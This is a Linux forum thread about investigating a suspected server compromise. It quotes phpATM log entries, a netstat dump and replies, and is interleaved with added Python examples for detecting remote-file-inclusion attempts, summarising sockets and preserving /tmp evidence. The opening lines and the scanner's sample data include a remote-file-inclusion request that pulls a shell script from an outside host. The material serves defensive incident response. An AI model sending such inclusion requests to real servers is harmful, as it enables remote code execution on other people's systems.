GET /phpATM/files/cmd.php.ns?page=http://xthost.info/w00t/shell.txt HTTP/1.1 with response code(s) 200 200
GET /phpATM/files/cmd.php.ns HTTP/1.1 with response code(s)
These are both phpATM vulnerabilities, so you'd need to have it installed. You can see info on the bug these exploit here.

Quote:
Error: Illegal request...: 1 Time(s)
....
lost page write due to I/O error on fd0...: 1 Time(s)
These look like drive read errors that you'll often see with hardware problems (like harddrive DMA issues for example). Not sure, but these may be unrelated (especially the fd (floppy drive) errors).

Quote:
c. I found processes related to these (I piped these to a .txt file that I don't have access to them right now; I would love to get someone else's opinion on their legitimacy or a pointer to a good resource on standard linux processes that should be running on a server)
Could you describe them in a little more detail?

Quote:
d. These entries look like a vulnerability noted at:
http://www.securityfocus.com/archive/1/398536?ref=rss
Slightly different bug. If this was the exploited vuln, you'd see the string "include_location" in the URL.
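Both request lines discussed in this post share one tell-tale: a query-string parameter whose value is itself a URL, which is what a remote file inclusion through an unvalidated PHP include looks like in the access log. The scanner below is an added example, not code from the thread; it parses combined-format access log lines, URL-decodes each parameter (twice, so a double-encoded `http%253A` is not missed) and reports the client, script, parameter and status code. The sample log lines are constructed: the request line and the `include_location` parameter name come from the thread, while the client addresses and timestamps are made up.

```python
"""Added example (not from the thread): flag remote-file-inclusion attempts in
Apache access logs, the pattern behind the LogWatch entries quoted in the thread.

A PHP include()/require() fed by an unvalidated request parameter lets a
request name a remote script; the give-away in the log is a query-string
value that is itself a URL. The log lines below are constructed in combined
log format; the request line and the 'include_location' parameter name come
from the thread, the client addresses and timestamps are made up.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_access_line(line):
    """Split one combined-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def remote_include_params(target):
    """Return [(param, decoded_value)] for query parameters whose value is a URL.

    parse_qsl decodes once; the extra unquote catches double-encoded values
    such as http%253A%252F%252F, a common attempt to slip past naive filters.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value).strip()
        if REMOTE_SCHEME.match(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """One finding per suspicious request: who, which script, which parameter, what status.

    A 200 only means the script answered; whether the include actually ran has
    to be confirmed on the host. It is still the line to look at first.
    """
    findings = []
    for line in lines:
        rec = parse_access_line(line)
        if not rec:
            continue
        hits = remote_include_params(rec["target"])
        if hits:
            findings.append({
                "client": rec["client"],
                "script": urlsplit(rec["target"]).path,
                "params": hits,
                "status": rec["status"],
            })
    return findings


# Constructed sample log lines (see module docstring for what is real and what is made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/May/2005:03:12:44 -0400] "GET /phpATM/files/cmd.php.ns?page=http://xthost.info/w00t/shell.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/May/2005:03:12:51 -0400] "GET /phpATM/files/cmd.php.ns HTTP/1.1" 200 318',
    '198.51.100.9 - - [24/May/2005:03:20:02 -0400] "GET /index.php?include_location=http%3A%2F%2F198.51.100.9%2Fx.txt HTTP/1.0" 404 294',
    '192.0.2.5 - - [24/May/2005:03:21:10 -0400] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        params = ", ".join(f"{n}={v}" for n, v in f["params"])
        print(f'{f["client"]} -> {f["script"]} [{f["status"]}] {params}')
```

Two points worth keeping in mind when reading the output. First, the second sample line (the bare `cmd.php.ns` request with no parameter) is not flagged by this rule, yet in the thread it is the follow-up request to a script that was just fed a remote URL, so findings should be read together with the neighbouring requests from the same client. Second, the durable fix is in the application (never pass request data to include/require), with `allow_url_fopen = Off` in php.ini as a belt-and-braces setting on hosts where nothing legitimately needs it.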
 
Old 05-26-2005, 05:23 AM   #8
rioguia
Member
 
Registered: Jun 2002
Posts: 411

Original Poster
Rep: Reputation: 30
netstat -ap

Capt_Caveman THANKS

Here is a list of active network connections on my machine that runs DNS, mysql, Dovecot, Postfix, and httpd (apache 2.x) at run level 5 using GNOME. If you see anything suspicious, please let me know:


Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 *:mysql *:* LISTEN 2752/mysqld
tcp 0 0 testy.substantis:domain *:* LISTEN 2698/named
tcp 0 0 testy.substantis:domain *:* LISTEN 2686/named
tcp 0 0 *:smtp *:* LISTEN 2816/master
tcp 0 0 testy.substantis.:32826 download.fedora.re:http TIME_WAIT -
tcp 0 0 testy.substantis.:32825 download.fedora.re:http TIME_WAIT -
tcp 0 0 *:imaps *:* LISTEN 2664/dovecot
tcp 0 0 *:pop3s *:* LISTEN 2664/dovecot
tcp 0 0 *:pop3 *:* LISTEN 2664/dovecot
tcp 0 0 *:imap *:* LISTEN 2664/dovecot
tcp 0 0 *:http *:* LISTEN 2842/httpd
tcp 0 0 *:smtp *:* LISTEN 2816/master
tcp 0 0 *:https *:* LISTEN 2842/httpd
udp 0 0 *:32768 *:* 2686/named
udp 0 0 *:domain *:* 2698/named
udp 0 0 testy.substantis:domain *:* 2698/named
udp 0 0 testy.substantis:domain *:* 2686/named
udp 0 0 *:32769 *:* 2686/named
udp 0 0 *:32770 *:* 2698/named
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 21 [ ] DGRAM 2713 2551/syslogd /dev/log
unix 2 [ ACC ] STREAM LISTENING 3622 2942/gdm-binary /tmp/.gdm_socket
unix 2 [ ACC ] STREAM LISTENING 3349 2873/xfs /tmp/.font-unix/fs7100
unix 2 [ ACC ] STREAM LISTENING 3644 3137/X /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM LISTENING 22112 4945/ssh-agent /tmp/ssh-AXJF4883/agent.4883
unix 2 [ ACC ] STREAM LISTENING 22550 5099/mapping-daemon /tmp/mapping-root
unix 2 [ ACC ] STREAM LISTENING 22138 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 2 [ ACC ] STREAM LISTENING 22147 4883/gnome-session /tmp/orbit-root/linc-1313-0-548572a49c081
unix 2 [ ACC ] STREAM LISTENING 22259 4883/gnome-session /tmp/.ICE-unix/4883
unix 2 [ ACC ] STREAM LISTENING 3404 2907/dbus-daemon-1 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 22267 4958/gnome-keyring- /tmp/keyring-IVOTlz/socket
unix 2 [ ACC ] STREAM LISTENING 22277 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 2 [ ACC ] STREAM LISTENING 22298 4962/gnome-settings /tmp/orbit-root/linc-1362-0-5fac0d92c7ccc
unix 2 [ ACC ] STREAM LISTENING 22436 5064/metacity /tmp/orbit-root/linc-13c8-0-55f17d47e3b3f
unix 2 [ ACC ] STREAM LISTENING 22459 5066/gnome-panel /tmp/orbit-root/linc-13ca-0-5c04673fb9fb8
unix 2 [ ACC ] STREAM LISTENING 22478 5068/nautilus /tmp/orbit-root/linc-13cc-0-4e34f8a919b28
unix 2 [ ACC ] STREAM LISTENING 22516 5076/gnome-vfs-daem /tmp/orbit-root/linc-13d4-0-742590725e6f6
unix 2 [ ACC ] STREAM LISTENING 22592 5103/notification-a /tmp/orbit-root/linc-13ef-0-4f6434af581e4
unix 2 [ ACC ] STREAM LISTENING 22621 5105/wnck-applet /tmp/orbit-root/linc-13f1-0-4f6434afdf143
unix 2 [ ACC ] STREAM LISTENING 22644 5072/python /tmp/orbit-root/linc-13d0-0-79135e0847e32
unix 2 [ ACC ] STREAM LISTENING 22741 5107/gnome-terminal /tmp/orbit-root/linc-13f3-0-618ed24758313
unix 2 [ ACC ] STREAM LISTENING 3245 2828/gpm /dev/gpmctl
unix 2 [ ACC ] STREAM LISTENING 3136 2816/master public/cleanup
unix 2 [ ACC ] STREAM LISTENING 3143 2816/master private/rewrite
unix 2 [ ACC ] STREAM LISTENING 3147 2816/master private/bounce
unix 2 [ ACC ] STREAM LISTENING 3151 2816/master private/defer
unix 2 [ ACC ] STREAM LISTENING 3155 2816/master public/flush
unix 2 [ ACC ] STREAM LISTENING 3159 2816/master private/proxymap
unix 2 [ ACC ] STREAM LISTENING 3163 2816/master private/smtp
unix 2 [ ACC ] STREAM LISTENING 3167 2816/master private/relay
unix 2 [ ACC ] STREAM LISTENING 3171 2816/master public/showq
unix 2 [ ACC ] STREAM LISTENING 3175 2816/master private/error
unix 2 [ ACC ] STREAM LISTENING 3179 2816/master private/local
unix 2 [ ACC ] STREAM LISTENING 3183 2816/master private/virtual
unix 2 [ ACC ] STREAM LISTENING 3187 2816/master private/lmtp
unix 2 [ ACC ] STREAM LISTENING 3191 2816/master private/maildrop
unix 2 [ ACC ] STREAM LISTENING 3195 2816/master private/old-cyrus
unix 2 [ ACC ] STREAM LISTENING 3199 2816/master private/cyrus
unix 2 [ ACC ] STREAM LISTENING 3203 2816/master private/uucp
unix 2 [ ACC ] STREAM LISTENING 3207 2816/master private/ifmail
unix 2 [ ACC ] STREAM LISTENING 3211 2816/master private/bsmtp
unix 2 [ ACC ] STREAM LISTENING 2899 2664/dovecot /var/run/dovecot-login/default
unix 2 [ ACC ] STREAM LISTENING 3008 2752/mysqld /var/lib/mysql/mysql.sock
unix 2 [ ] DGRAM 2715 2551/syslogd /home/chroot-dns-int/dev/log
unix 2 [ ] DGRAM 2717 2551/syslogd /home/chroot-dns-ext/dev/log
unix 3 [ ] STREAM CONNECTED 22757 5108/gnome-pty-help
unix 3 [ ] STREAM CONNECTED 22756 5107/gnome-terminal
unix 3 [ ] STREAM CONNECTED 22748 5107/gnome-terminal /tmp/orbit-root/linc-13f3-0-618ed24758313
unix 3 [ ] STREAM CONNECTED 22747 4960/bonobo-activat
unix 3 [ ] STREAM CONNECTED 22746 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 3 [ ] STREAM CONNECTED 22745 5107/gnome-terminal
unix 3 [ ] STREAM CONNECTED 22744 5107/gnome-terminal /tmp/orbit-root/linc-13f3-0-618ed24758313
unix 3 [ ] STREAM CONNECTED 22743 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22740 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22739 5107/gnome-terminal
unix 3 [ ] STREAM CONNECTED 22734 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22733 5107/gnome-terminal
unix 3 [ ] STREAM CONNECTED 22647 5072/python /tmp/orbit-root/linc-13d0-0-79135e0847e32
unix 3 [ ] STREAM CONNECTED 22646 4955/gconfd-2
unix 3 [ ] STREAM CONNECTED 22643 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 3 [ ] STREAM CONNECTED 22642 5072/python
unix 3 [ ] STREAM CONNECTED 22641 4883/gnome-session /tmp/.ICE-unix/4883
unix 3 [ ] STREAM CONNECTED 22640 5072/python
unix 3 [ ] STREAM CONNECTED 22638 5066/gnome-panel /tmp/orbit-root/linc-13ca-0-5c04673fb9fb8
unix 3 [ ] STREAM CONNECTED 22637 5105/wnck-applet
unix 3 [ ] STREAM CONNECTED 3214 2816/master
unix 3 [ ] STREAM CONNECTED 3213 2816/master
unix 3 [ ] STREAM CONNECTED 3214 2816/master
unix 3 [ ] STREAM CONNECTED 3213 2816/master
unix 3 [ ] STREAM CONNECTED 3210 2816/master
unix 3 [ ] STREAM CONNECTED 3209 2816/master
unix 3 [ ] STREAM CONNECTED 3206 2816/master
unix 3 [ ] STREAM CONNECTED 3205 2816/master
unix 3 [ ] STREAM CONNECTED 3202 2816/master
unix 3 [ ] STREAM CONNECTED 3201 2816/master
unix 3 [ ] STREAM CONNECTED 3198 2816/master
unix 3 [ ] STREAM CONNECTED 3197 2816/master
unix 3 [ ] STREAM CONNECTED 3194 2816/master
unix 3 [ ] STREAM CONNECTED 3193 2816/master
unix 3 [ ] STREAM CONNECTED 3190 2816/master
unix 3 [ ] STREAM CONNECTED 3189 2816/master
unix 3 [ ] STREAM CONNECTED 3186 2816/master
unix 3 [ ] STREAM CONNECTED 3185 2816/master
unix 3 [ ] STREAM CONNECTED 3182 2816/master
unix 3 [ ] STREAM CONNECTED 3181 2816/master
unix 3 [ ] STREAM CONNECTED 3178 2816/master
unix 3 [ ] STREAM CONNECTED 3177 2816/master
unix 3 [ ] STREAM CONNECTED 3174 2816/master
unix 3 [ ] STREAM CONNECTED 3173 2816/master
unix 3 [ ] STREAM CONNECTED 3170 2816/master
unix 3 [ ] STREAM CONNECTED 3169 2816/master
unix 3 [ ] STREAM CONNECTED 3166 2816/master
unix 3 [ ] STREAM CONNECTED 3165 2816/master
unix 3 [ ] STREAM CONNECTED 3162 2816/master
unix 3 [ ] STREAM CONNECTED 3161 2816/master
unix 3 [ ] STREAM CONNECTED 3158 2816/master
unix 3 [ ] STREAM CONNECTED 3157 2816/master
unix 3 [ ] STREAM CONNECTED 3154 2816/master
unix 3 [ ] STREAM CONNECTED 3153 2816/master
unix 3 [ ] STREAM CONNECTED 3150 2816/master
unix 3 [ ] STREAM CONNECTED 3149 2816/master
unix 3 [ ] STREAM CONNECTED 3146 2816/master
unix 3 [ ] STREAM CONNECTED 3145 2816/master
unix 3 [ ] STREAM CONNECTED 3142 2816/master
unix 3 [ ] STREAM CONNECTED 3141 2816/master
unix 3 [ ] STREAM CONNECTED 3139 2816/master
unix 3 [ ] STREAM CONNECTED 3138 2816/master
unix 3 [ ] STREAM CONNECTED 3135 2816/master
unix 3 [ ] STREAM CONNECTED 3134 2816/master
unix 3 [ ] STREAM CONNECTED 3129 2816/master
unix 3 [ ] STREAM CONNECTED 3128 2816/master
unix 2 [ ] DGRAM 3111 2816/master
unix 2 [ ] DGRAM 2968 2710/xinetd
unix 2 [ ] DGRAM 2934 2698/named
unix 2 [ ] DGRAM 2927 2690/dovecot-auth
unix 3 [ ] STREAM CONNECTED 2933 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2926 2696/pop3-login
unix 3 [ ] STREAM CONNECTED 2932 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2925 2695/pop3-login
unix 3 [ ] STREAM CONNECTED 2931 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2924 2694/pop3-login
unix 3 [ ] STREAM CONNECTED 2930 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2923 2693/imap-login
unix 3 [ ] STREAM CONNECTED 2929 2690/dovecot-auth /var/run/dovecot-login/default

Last edited by rioguia; 05-26-2005 at 05:25 AM.
 
Old 05-26-2005, 05:25 AM   #9
rioguia
Member
 
Registered: Jun 2002
Posts: 411

Original Poster
Rep: Reputation: 30
netstat -ap continued

unix 3 [ ] STREAM CONNECTED 2922 2692/imap-login
unix 3 [ ] STREAM CONNECTED 2928 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2921 2691/imap-login
unix 2 [ ] DGRAM 2920 2695/pop3-login
unix 2 [ ] DGRAM 2919 2696/pop3-login
unix 2 [ ] DGRAM 2918 2692/imap-login
unix 2 [ ] DGRAM 2917 2693/imap-login
unix 2 [ ] DGRAM 2916 2691/imap-login
unix 2 [ ] DGRAM 2915 2694/pop3-login
unix 3 [ ] STREAM CONNECTED 2914 2696/pop3-login
unix 3 [ ] STREAM CONNECTED 2913 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2912 2695/pop3-login
unix 3 [ ] STREAM CONNECTED 2911 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2910 2694/pop3-login
unix 3 [ ] STREAM CONNECTED 2909 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2908 2693/imap-login
unix 3 [ ] STREAM CONNECTED 2907 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2906 2692/imap-login
unix 3 [ ] STREAM CONNECTED 2905 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2904 2691/imap-login
unix 3 [ ] STREAM CONNECTED 2903 2664/dovecot
unix 3 [ ] STREAM CONNECTED 2902 2690/dovecot-auth
unix 3 [ ] STREAM CONNECTED 2901 2664/dovecot
unix 2 [ ] DGRAM 2881 2686/named
unix 2 [ ] DGRAM 2853 2664/dovecot
unix 2 [ ] DGRAM 2725 2555/klogd
 
Old 05-26-2005, 12:20 PM   #10
v00d00101
Member
 
Registered: Jun 2003
Location: UK
Distribution: Devuan Beowulf
Posts: 514
Blog Entries: 1

Rep: Reputation: 37
My question would be, what is master? Is it an a/c you set up?
 
Old 05-26-2005, 02:42 PM   #11
rioguia
Member
 
Registered: Jun 2002
Posts: 411

Original Poster
Rep: Reputation: 30
Postfix

I initially had the same question and I am trying to get more information.

I think that this is just Postfix (but I'm not sure). According to the program's author,

Quote:
Sockets and FIFOs are opened under control by /etc/postfix/master.cf (or whatever your master configuration file is). Each socket gives access to a class of Postfix daemons.
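To answer "what is master?" from a dump like the one above, group the Unix-socket rows by PID/Program and check the program names against the daemons you expect on the box. This is an added Python example, not code from the thread or from Postfix; the sample rows are copied from the dump (plus one constructed LISTENING row), and the allowlist of names is an assumption you would build from the box's own service list.

```python
import re
from collections import defaultdict

# One Unix-domain socket row of `netstat -ap`. The State column is absent for
# DGRAM sockets, PID/Program is "-" for processes you may not inspect, and the
# Path column is optional (unnamed socket pairs such as the master rows).
UNIX_ROW = re.compile(
    r"^unix\s+(?P<refcnt>\d+)\s+\[(?P<flags>[^\]]*)\]\s+"
    r"(?P<type>STREAM|DGRAM|SEQPACKET)\s+(?:(?P<state>[A-Z]+)\s+)?"
    r"(?P<inode>\d+)\s+(?P<prog>\S+)(?:\s+(?P<path>\S.*))?$"
)

def summarize_unix_sockets(lines):
    """Group socket rows by 'PID/Program': total count, count per type, and the named paths."""
    summary = defaultdict(lambda: {"count": 0, "types": defaultdict(int), "paths": set()})
    for line in lines:
        m = UNIX_ROW.match(line.strip())
        if not m:
            continue  # headers, TCP/UDP rows and blank lines are skipped
        entry = summary[m.group("prog")]
        entry["count"] += 1
        entry["types"][m.group("type")] += 1
        if m.group("path"):
            entry["paths"].add(m.group("path"))
    return dict(summary)

def unexpected_programs(summary, known):
    """Program names (the part after 'PID/') that are not on the allowlist `known`."""
    names = {prog.partition("/")[2] or prog for prog in summary}
    return sorted(names - set(known))

# Rows copied from the thread's dump, plus one constructed LISTENING row
# (not in the thread) to exercise the '[ ACC ]' flag form.
SAMPLE = """\
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 3100 2816/master public/pickup
unix 3 [ ] STREAM CONNECTED 3214 2816/master
unix 3 [ ] STREAM CONNECTED 3213 2816/master
unix 2 [ ] DGRAM 3111 2816/master
unix 3 [ ] STREAM CONNECTED 2933 2690/dovecot-auth /var/run/dovecot-login/default
unix 3 [ ] STREAM CONNECTED 2926 2696/pop3-login
unix 3 [ ] STREAM CONNECTED 22614 3137/X /tmp/.X11-unix/X0
unix 2 [ ] DGRAM 2725 2555/klogd
""".splitlines()

if __name__ == "__main__":
    s = summarize_unix_sockets(SAMPLE)
    for prog, e in sorted(s.items(), key=lambda kv: -kv[1]["count"]):
        print(f"{prog:20} {e['count']:3}  {dict(e['types'])}  {sorted(e['paths'])}")
    print("not on allowlist:", unexpected_programs(s, {"master", "dovecot-auth", "pop3-login"}))
```

Many rows for one PID, as with 2816/master here, are one daemon holding many socket pairs, not many processes; the thing to check is the program name against what the box should be running.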
 
Old 05-26-2005, 07:35 PM   #12
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
This will explain in more detail than I can: http://www.postfix.org/master.8.html

What were the files you found in /tmp and /var/tmp? Who owned them? What processes were associated with them, etc.? FWIW, the rOnin file is usually part of a cracking toolkit.

Does chkrootkit report a clean scan now that it's running properly?


Last edited by Capt_Caveman; 05-26-2005 at 07:40 PM.
 
Old 05-26-2005, 09:21 PM   #13
rioguia
Member
 
Registered: Jun 2002
Posts: 411

Original Poster
Rep: Reputation: 30
Sorry

I deleted the files. After reading from your security references, I realize I should have at least made a copy of the /tmp directory. I'll see if I can recover some of this information.

Yes, chkrootkit and rkhunter report no problems (but I still don't trust this box).

I have a clean install of Fedora Core 3 that I think will become my server, and then I'll just flatten this one (I've been meaning to try OpenBSD for a while now). I don't think it would have made much difference in this case since it was an application that was the source of the problem.
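Capt_Caveman's questions about the /tmp files (owner, associated processes) and rioguia's point about keeping a copy before deleting anything are what the following added Python example does; it is not code from the thread. It inventories a directory with owner, mode, mtime and the PIDs holding each file open, then copies the directory aside with metadata preserved. The /proc scan is Linux-specific and only sees other users' processes when run as root; the evidence directory path is the caller's choice.

```python
import os
import pwd
import shutil
import stat
import time

def owner_name(uid):
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)  # a uid with no passwd entry is itself worth noting

def processes_with_open(path):
    """PIDs holding `path` open, via /proc/<pid>/fd links (Linux; run as root to see every process)."""
    target, holders = os.path.realpath(path), []
    pids = filter(str.isdigit, os.listdir("/proc")) if os.path.isdir("/proc") else []
    for pid in pids:
        fd_dir = os.path.join("/proc", pid, "fd")
        try:
            if any(os.path.realpath(os.path.join(fd_dir, fd)) == target for fd in os.listdir(fd_dir)):
                holders.append(int(pid))
        except OSError:
            continue  # process exited, or not ours to inspect
    return holders

def inventory(directory):
    """One record per entry under `directory`: path, owner, mode, mtime (UTC), PIDs holding it open."""
    records = []
    for root, dirs, files in os.walk(directory):
        for name in dirs + files:
            p = os.path.join(root, name)
            st = os.lstat(p)
            records.append({
                "path": p, "owner": owner_name(st.st_uid), "mode": stat.filemode(st.st_mode),
                "mtime": time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(st.st_mtime)),
                "holders": processes_with_open(p) if stat.S_ISREG(st.st_mode) else []})
    return records

def _skip_special(directory, names):
    """copytree ignore callback: sockets and FIFOs (e.g. /tmp/.X11-unix/X0) cannot be copied as files."""
    modes = {n: os.lstat(os.path.join(directory, n)).st_mode for n in names}
    return {n for n, m in modes.items() if stat.S_ISSOCK(m) or stat.S_ISFIFO(m)}

def preserve(directory, evidence_root):
    """Copy `directory` under `evidence_root` (symlinks kept as links, mode and mtime preserved)."""
    stamp = time.strftime("%Y%m%dT%H%M%SZ", time.gmtime())
    dest = os.path.join(evidence_root, os.path.basename(directory.rstrip("/")) + "-" + stamp)
    shutil.copytree(directory, dest, symlinks=True, ignore=_skip_special)
    return dest
```

Run `preserve("/tmp", "/root/evidence")` before touching anything, then `inventory("/tmp")` to see who owns each entry and which PIDs still have it open; the copy keeps the timestamps that the original loses the moment files are deleted.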